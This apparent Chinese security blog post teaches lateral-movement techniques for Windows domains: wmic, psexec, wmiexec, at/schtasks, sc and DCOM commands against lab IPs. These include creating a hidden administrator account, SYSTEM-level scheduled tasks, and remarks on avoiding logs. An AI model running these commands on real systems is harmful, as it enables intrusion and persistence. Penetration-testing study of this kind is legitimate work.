<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="域渗透远程执行命令的几种姿势0x00 vmicWMI 的全称是 Windows Management Instrumentation，它出现在所有的 Windows 操作系统中，并由一组强大的工具集合组成，用于管理本地或远程的 Windows 系统，攻击者使用 wmi 来进行攻击，但 Windows 系统默认不会在日志中记录这些操作，可以做到无日志，攻击脚本无需写入到磁盘，增加了隐蔽性。推荐使用">
<meta property="og:type" content="article">
<meta property="og:title" content="域渗透远程执行命令的几种姿势">
<meta property="og:url" content="http://140.143.122.13/posts/35747.html">
<meta property="og:site_name" content="忆时光">
<meta property="og:description" content="域渗透远程执行命令的几种姿势0x00 vmicWMI 的全称是 Windows Management Instrumentation，它出现在所有的 Windows 操作系统中，并由一组强大的工具集合组成，用于管理本地或远程的 Windows 系统，攻击者使用 wmi 来进行攻击，但 Windows 系统默认不会在日志中记录这些操作，可以做到无日志，攻击脚本无需写入到磁盘，增加了隐蔽性。推荐使用">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://140.143.122.13/posts/35747/11.png">
<meta property="og:image" content="http://140.143.122.13/posts/35747/12.png">
<meta property="og:image" content="http://140.143.122.13/posts/35747/21.png">
<meta property="og:image" content="http://140.143.122.13/posts/35747/22.png">
<meta property="og:image" content="http://140.143.122.13/posts/35747/23.png">
<meta property="og:image" content="http://140.143.122.13/posts/35747/1.png">
<meta property="og:image" content="http://140.143.122.13/posts/35747/2.png">
<meta property="og:image" content="http://140.143.122.13/posts/35747/3.png">
<meta property="og:image" content="http://140.143.122.13/posts/35747/4.png">
<meta property="og:image" content="http://140.143.122.13/posts/35747/5.png">
<meta property="og:image" content="http://140.143.122.13/posts/35747/6.png">
<meta property="article:published_time" content="2019-10-16T12:08:41.000Z">
<meta property="article:modified_time" content="2020-04-26T13:21:49.002Z">
<meta property="article:author" content="ca5tle">
<meta property="article:tag" content="域渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://140.143.122.13/posts/35747/11.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>域渗透远程执行命令的几种姿势</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="忆时光" type="application/atom+xml" />
    
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="httP://www.sectime.top:8888">Img</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="http://github.com/mysecroad" target="_blank" rel="noopener">Projects</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/posts/13577.html"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/posts/44578.html"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://140.143.122.13/posts/35747.html" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://140.143.122.13/posts/35747.html&text=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://140.143.122.13/posts/35747.html&title=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://140.143.122.13/posts/35747.html&is_video=false&description=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=域渗透远程执行命令的几种姿势&body=Check out this article: http://140.143.122.13/posts/35747.html"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://140.143.122.13/posts/35747.html&title=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://140.143.122.13/posts/35747.html&title=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://140.143.122.13/posts/35747.html&title=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://140.143.122.13/posts/35747.html&title=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://140.143.122.13/posts/35747.html&name=域渗透远程执行命令的几种姿势&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://140.143.122.13/posts/35747.html&t=域渗透远程执行命令的几种姿势" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#域渗透远程执行命令的几种姿势"><span class="toc-number">1.</span> <span class="toc-text">域渗透远程执行命令的几种姿势</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-vmic"><span class="toc-number">1.1.</span> <span class="toc-text">0x00 vmic</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#常用命令"><span class="toc-number">1.1.1.</span> <span class="toc-text">常用命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#工具说明"><span class="toc-number">1.1.2.</span> <span class="toc-text">工具说明</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-psexec"><span class="toc-number">1.2.</span> <span class="toc-text">0x01 psexec</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#使用方法"><span class="toc-number">1.2.1.</span> <span class="toc-text">使用方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#执行原理"><span class="toc-number">1.2.2.</span> <span class="toc-text">执行原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#工具说明-1"><span class="toc-number">1.2.3.</span> <span class="toc-text">工具说明</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-WMIEXEC"><span class="toc-number">1.3.</span> <span class="toc-text">0x02 WMIEXEC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-at-amp-schtasks计划任务"><span class="toc-number">1.4.</span> <span class="toc-text">0x03 at&amp;schtasks计划任务</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#net-use-at"><span class="toc-number">1.4.1.</span> <span class="toc-text">net use + at</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#schtasks"><span class="toc-number">1.4.2.</span> <span class="toc-text">schtasks</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#常用命令-1"><span class="toc-number">1.4.3.</span> <span class="toc-text">常用命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-SC添加服务远程执行命令"><span class="toc-number">1.5.</span> <span class="toc-text">0x04 SC添加服务远程执行命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#常用命令-2"><span class="toc-number">1.5.1.</span> <span class="toc-text">常用命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-smbexec"><span class="toc-number">1.6.</span> <span class="toc-text">0x05 smbexec</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#常用命令-3"><span class="toc-number">1.6.1.</span> <span class="toc-text">常用命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-利用DCOM在远程系统执行程序"><span class="toc-number">1.7.</span> <span class="toc-text">0x06 利用DCOM在远程系统执行程序</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#DCOM使用介绍"><span class="toc-number">1.7.1.</span> <span class="toc-text">DCOM使用介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#获得DCOM的程序列表"><span class="toc-number">1.7.1.1.</span> <span class="toc-text">获得DCOM的程序列表</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#对本机测试"><span class="toc-number">1.7.1.2.</span> <span class="toc-text">对本机测试</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#对远程系统测试"><span class="toc-number">1.7.1.3.</span> <span class="toc-text">对远程系统测试</span></a></li></ol></li></ol></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        域渗透远程执行命令的几种姿势
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">忆时光</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-10-16T12:08:41.000Z" itemprop="datePublished">2019-10-16</time>
        
        (Updated: <time datetime="2020-04-26T13:21:49.002Z" itemprop="dateModified">2020-04-26</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/" rel="tag">域渗透</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="域渗透远程执行命令的几种姿势"><a href="#域渗透远程执行命令的几种姿势" class="headerlink" title="域渗透远程执行命令的几种姿势"></a>域渗透远程执行命令的几种姿势</h1><h2 id="0x00-vmic"><a href="#0x00-vmic" class="headerlink" title="0x00 vmic"></a>0x00 vmic</h2><p>WMI 的全称是 Windows Management Instrumentation，它出现在所有的 Windows 操作系统中，并由一组强大的工具集合组成，用于管理本地或远程的 Windows 系统，攻击者使用 wmi 来进行攻击，但 Windows 系统默认不会在日志中记录这些操作，可以做到<strong>无日志</strong>，攻击脚本无需写入到磁盘，增加了隐蔽性。推荐使用 wmic 进行远程执行命令。</p>
<h3 id="常用命令"><a href="#常用命令" class="headerlink" title="常用命令"></a>常用命令</h3><ol>
<li><p>在远程系统上执行 bat 脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic &#x2F;node:192.168.72.10 &#x2F;user:administrator &#x2F;password:L111111! process call create c:\test.bat</span><br></pre></td></tr></table></figure></li>
<li><p>在远程系统上执行单条命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic &#x2F;node:192.168.72.10 &#x2F;user:administrator &#x2F;password:L111111 process call create &quot;cmd.exe &#x2F;c net user test1 !@#123QWE &#x2F;add &amp;&amp; net localgroup administrators test1 &#x2F;add</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h3 id="工具说明"><a href="#工具说明" class="headerlink" title="工具说明"></a>工具说明</h3><ol>
<li>需要远程系统启动 Windows Management Instrumentation 服务，开放135端口</li>
<li>远程系统的本地安全策略的“网络访问: 本地帐户的共享和安全模式”应设为“经典-本地用户以自己的身份验证”</li>
<li>wmic 会以管理员权限在远程系统上执行命令</li>
<li>防火墙开启将无法连接</li>
<li>如果报错 “Invalid Global Switch” ，用双引号把包含-的结点括起来即可正常执行。</li>
</ol>
<h2 id="0x01-psexec"><a href="#0x01-psexec" class="headerlink" title="0x01 psexec"></a>0x01 psexec</h2><h3 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h3><p>psexec针对远程建立连接的认证方式有两种，一种先建立 ipc 连接，然后直接用 <code>psexec \\192.168.72.10 cmd</code> 命令开启一个半交互式的cmdshell，另一种是在psexec的参数中指定账号密码。</p>
<p><img src="/posts/35747/11.png" alt></p>
<p><img src="/posts/35747/12.png" alt></p>
<h3 id="执行原理"><a href="#执行原理" class="headerlink" title="执行原理"></a>执行原理</h3><ol>
<li>通过ipc连接，释放psexesvc.exe到目标</li>
<li>通过服务管理SCManager远程创建psexecsvc服务，并启动服务</li>
<li>客户端连接执行命令,服务端启动相应的程序并执行回显数据</li>
</ol>
<h3 id="工具说明-1"><a href="#工具说明-1" class="headerlink" title="工具说明"></a>工具说明</h3><p><strong>注意：</strong></p>
<ol>
<li>目标主机第一次运行时，会出现弹框提示。<br>解决办法：先执行 <code>psexec /accepteula</code> 即可避免。</li>
<li>运行完之后记得删除服务。这个在日志中会有记录，而且在少数情况下会出现服务删除不成功！！！<br>所以一般不用它。</li>
<li>需要远程系统开启 ADMIN$ 共享</li>
<li>建立 ipc 连接后可以不指定用户名和密码</li>
</ol>
<h2 id="0x02-WMIEXEC"><a href="#0x02-WMIEXEC" class="headerlink" title="0x02 WMIEXEC"></a>0x02 WMIEXEC</h2><p>WMI 可以远程执行命令，大牛使用VBS脚本调用WMI来模拟 psexec 的功能，于是乎WMIEXEC 就诞生了。基本上psexec 能用的地方，这个脚本也能够使用。整个过程是先调用WMI通过账号密码或者NTLM认证（WCE注入）连接到远程计算机，然后如果提供了账号密码，则用这个账号密码建立一个到目标的IPC连接。随后WMI会建立一个共享文件夹，用于远程读取命令执行结果。 当用户输入命令时，WMI创建进程执行该命令，然后把结果输出到文件，这个文件位于之前创建的共享文件夹中。最后，通过FSO组件访问远程共享文件夹中的结果文件，将结果输出。当结果读取完成时，调用WMI执行命令删除结果文件。最后当WMIEXEC退出时，删除文件共享。<br><img src="/posts/35747/21.png" alt><br>WMIEXEC支持两种模式，一种是半交互式shell模式，另一种是执行单条命令模式。</p>
<p>WMIEXEC需要提供账号密码进行远程连接，但是如果没有破解出账号密码，也可以配合WCE的hash注入功能一起使用，先进行hash注入，然后再使用WMIEXEC即可。</p>
<p><strong>半交互式shell模式</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript.exe &#x2F;&#x2F;nologo wmiexec.vbs &#x2F;shell IP username password</span><br></pre></td></tr></table></figure>
<p><img src="/posts/35747/22.png" alt></p>
<p><strong>单个命令执行的模式</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript.exe wmiexec.vbs &#x2F;cmd IP username password &quot;command&quot;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/35747/23.png" alt></p>
<h2 id="0x03-at-amp-schtasks计划任务"><a href="#0x03-at-amp-schtasks计划任务" class="headerlink" title="0x03 at&amp;schtasks计划任务"></a>0x03 at&amp;schtasks计划任务</h2><h3 id="net-use-at"><a href="#net-use-at" class="headerlink" title="net use + at"></a>net use + at</h3><p>建立ipc连接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use \\目标IP\ipc$ password &#x2F;user:username</span><br></pre></td></tr></table></figure>
<p>拷贝文件到远程系统</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy 文件 \\目标IP\c$</span><br></pre></td></tr></table></figure>
<p>查看远程主机当前时间</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use \\目标IP</span><br></pre></td></tr></table></figure>
<p>添加计划任务在远程系统上执行命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">at \\目标IP 时间 cmd.exe &#x2F;c &quot;ipconfig &#x2F;all &gt;c:ip.log&quot;</span><br></pre></td></tr></table></figure>
<p>添加计划任务在远程系统上执行bat脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">at \\目标IP 时间 c:test.bat</span><br></pre></td></tr></table></figure>
<p>查看at任务列表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">at \\目标IP</span><br></pre></td></tr></table></figure>
<p>删除at计划任务，运行完成后一定要删除计划任务！</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">at \\目标IP 1 &#x2F;delete</span><br></pre></td></tr></table></figure>
<p>查看所有ipc连接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use</span><br></pre></td></tr></table></figure>
<p>删除指定ipc连接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use \\目标IP\ipc$ &#x2F;del</span><br></pre></td></tr></table></figure>
<p>删除所有ipc连接（删除前记得确认是否都是自己测试中建立的连接）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use * &#x2F;del &#x2F;y</span><br></pre></td></tr></table></figure>

<h3 id="schtasks"><a href="#schtasks" class="headerlink" title="schtasks"></a>schtasks</h3><h3 id="常用命令-1"><a href="#常用命令-1" class="headerlink" title="常用命令"></a>常用命令</h3><p>在远程系统建立计划任务(计划运行时会以 system 权限在远程系统上执行单条命令)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks &#x2F;create &#x2F;s 192.168.17.138 &#x2F;u workgroup\administrator &#x2F;p &quot;!@#123QWE&quot; &#x2F;tn test &#x2F;sc onstart &#x2F;tr &quot;cmd.exe &#x2F;c netstat -ano | findstr 3389 &gt;&gt; c:\programdata\error.log&quot; &#x2F;ru system &#x2F;f</span><br></pre></td></tr></table></figure>
<p>在远程系统建立计划任务(计划运行时会以 system 权限在远程系统上执行 bat 脚本)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks &#x2F;create &#x2F;s 192.168.17.138 &#x2F;u workgroup\administrator &#x2F;p &quot;!@#123QWE&quot; &#x2F;tn test &#x2F;sc onstart &#x2F;tr c:\programdata\test.bat &#x2F;ru system &#x2F;f</span><br></pre></td></tr></table></figure>
<p>在远程系统建立计划任务(计划运行时会以管理员权限在远程系统上执行单条命令),注：这条命令不支持 hash 注入后省去用户名密码执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks &#x2F;create &#x2F;s 192.168.17.138 &#x2F;u workgroup\administrator &#x2F;p &quot;!@#123QWE&quot; &#x2F;tn test &#x2F;sc onstart &#x2F;tr &quot;cmd.exe &#x2F;c whoami &#x2F;all &gt;&gt; c:\programdata\error.log&quot; &#x2F;ru  workgroup\administrator&quot;</span><br></pre></td></tr></table></figure>
<p>查看建立的计划任务是否正确</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks &#x2F;query &#x2F;s 192.168.17.138 &#x2F;u workgroup\administrator &#x2F;p &quot;!@#123QWE&quot; | findstr test</span><br></pre></td></tr></table></figure>
<p>运行建立的计划任务</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks &#x2F;run &#x2F;s 192.168.17.138 &#x2F;u workgroup\administrator &#x2F;p &quot;!@#123QWE&quot; &#x2F;i &#x2F;tn &quot;test&quot;</span><br></pre></td></tr></table></figure>
<p>删除建立的计划任务</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks &#x2F;delete &#x2F;s 192.168.17.138 &#x2F;u workgroup\administrator &#x2F;p &quot;!@#123QWE&quot; &#x2F;tn &quot;test&quot; &#x2F;f</span><br></pre></td></tr></table></figure>
<p>注意：<br>工具需要远程系统启动 Task Scheduler 服务，schtasks 不需要 RPC 服务的支持，在条件允许的情况下，尽量使用 schtasks，因为在某些条件下，at 执行完任务后，任务信息没有删除（需要手动删除），用at命令查不到任务信息，但是用 schtasks 却能看到任务信息，任务名是At加一个数字。</p>
<h2 id="0x04-SC添加服务远程执行命令"><a href="#0x04-SC添加服务远程执行命令" class="headerlink" title="0x04 SC添加服务远程执行命令"></a>0x04 SC添加服务远程执行命令</h2><h3 id="常用命令-2"><a href="#常用命令-2" class="headerlink" title="常用命令"></a>常用命令</h3><p>建立 ipc 连接后，上传等待运行的 bat 脚本到目标系统上，创建服务（开启服务时会以system 权限在远程系统上执行 bat 脚本）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc \\192.168.17.138 create test binpath&#x3D; &quot;cmd.exe &#x2F;c start c:\programdata\test.bat&quot;</span><br></pre></td></tr></table></figure>
<p>开启服务，运行其它命令可以直接修改 bat 脚本内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc \\192.168.17.138 start test</span><br></pre></td></tr></table></figure>
<p>删除服务</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc \\192.168.17.138 delete test</span><br></pre></td></tr></table></figure>

<h2 id="0x05-smbexec"><a href="#0x05-smbexec" class="headerlink" title="0x05 smbexec"></a>0x05 smbexec</h2><p>smbexec 是基于 psexec 修改的程序，加入了参数来指定默认共享，可以在目标为开启 admin$ 共享但开了其它共享时使用。</p>
<h3 id="常用命令-3"><a href="#常用命令-3" class="headerlink" title="常用命令"></a>常用命令</h3><p>建立 ipc 连接后，上传 execserver.exe 到远程系统上</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy execserver.exe \\192.168.17.138\c$\windows</span><br></pre></td></tr></table></figure>
<p>在远程系统上执行单条命令(以管理员权限执行命令)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.exe 192.168.17.138 Administrator !@#123QWE &quot;whoami &#x2F;all&quot; c$</span><br></pre></td></tr></table></figure>
<p>在远程系统上执行单条命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.exe 192.168.17.138 test !@#123QWE &quot;whoami &#x2F;all&quot; c$</span><br></pre></td></tr></table></figure>
<p>在远程系统上执行 bat 脚本(以管理员权限执行命令)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.exe 192.168.17.138 Administrator !@#123QWE c:\programdata\test.bat ipc$</span><br></pre></td></tr></table></figure>
<p>删除远程系统上的 execserver.exe</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">del \\192.168.17.138\c$\windows\execserver.exe</span><br></pre></td></tr></table></figure>

<h2 id="0x06-利用DCOM在远程系统执行程序"><a href="#0x06-利用DCOM在远程系统执行程序" class="headerlink" title="0x06 利用DCOM在远程系统执行程序"></a>0x06 利用DCOM在远程系统执行程序</h2><h3 id="DCOM使用介绍"><a href="#DCOM使用介绍" class="headerlink" title="DCOM使用介绍"></a>DCOM使用介绍</h3><h4 id="获得DCOM的程序列表"><a href="#获得DCOM的程序列表" class="headerlink" title="获得DCOM的程序列表"></a>获得DCOM的程序列表</h4><p>powershell命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Get-CimInstance Win32_DCOMApplication</span><br></pre></td></tr></table></figure>
<p><img src="/posts/35747/1.png" alt></p>
<p>注意：<br><code>Get-CimInstance</code> 只适用于Powershell 3.0及以上，Win7默认为2.0不支持，可使用以下替代命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication</span><br></pre></td></tr></table></figure>
<p>当然，直接使用wmic查询也可以，代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic &#x2F;NAMESPACE:&quot;\\root\CIMV2&quot; PATH Win32_DCOMApplication  GET &#x2F;all &#x2F;FORMAT:list</span><br></pre></td></tr></table></figure>
<p>powershell对WMI的调用可使用wmic命令进行替换，详情可参考：</p>
<p><a href="https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/" target="_blank" rel="noopener">https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/</a></p>
<h4 id="对本机测试"><a href="#对本机测试" class="headerlink" title="对本机测试"></a>对本机测试</h4><p>管理员权限，powershell代码如下:<br>获得”MMC20.Application”支持的操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$com &#x3D; [activator]::CreateInstance([type]::GetTypeFromProgID(&quot;MMC20.Application&quot;,&quot;127.0.0.1&quot;))</span><br><span class="line">$com.Document.ActiveView | Get-Member</span><br></pre></td></tr></table></figure>
<p><img src="/posts/35747/2.png" alt></p>
<p><strong>查看ExecuteShellCommand对应的参数说明</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$com.Document.ActiveView.ExecuteShellCommand</span><br></pre></td></tr></table></figure>
<p><img src="/posts/35747/3.png" alt></p>
<p>ExecuteShellCommand 对应的参数具体含义可参考以下链接：</p>
<p><a href="https://msdn.microsoft.com/en-us/library/aa815396(v=vs.85).aspx" target="_blank" rel="noopener">https://msdn.microsoft.com/en-us/library/aa815396(v=vs.85).aspx</a></p>
<p>通过ExecuteShellCommand执行程序</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$com &#x3D; [activator]::CreateInstance([type]::GetTypeFromProgID(&quot;MMC20.Application&quot;,&quot;127.0.0.1&quot;))</span><br><span class="line">$com.Document.ActiveView.ExecuteShellCommand(&#39;cmd.exe&#39;,$null,&quot;&#x2F;c calc.exe&quot;,&quot;Minimized&quot;)</span><br></pre></td></tr></table></figure>
<h4 id="对远程系统测试"><a href="#对远程系统测试" class="headerlink" title="对远程系统测试"></a>对远程系统测试</h4><p><strong>调用MMC20.Application</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$com &#x3D; [activator]::CreateInstance([type]::GetTypeFromProgID(&quot;MMC20.Application&quot;,&quot;192.168.72.10&quot;))</span><br><span class="line">$com.Document.ActiveView.ExecuteShellCommand(&#39;cmd.exe&#39;,$null,&quot;&#x2F;c calc.exe&quot;,&quot;Minimized&quot;)</span><br></pre></td></tr></table></figure>
<p><img src="/posts/35747/4.png" alt></p>
<p>win7查看后台程序列表<br><img src="/posts/35747/5.png" alt></p>
<p><strong>调用’9BA05972-F6A8-11CF-A442-00A0C90A8F39’</strong></p>
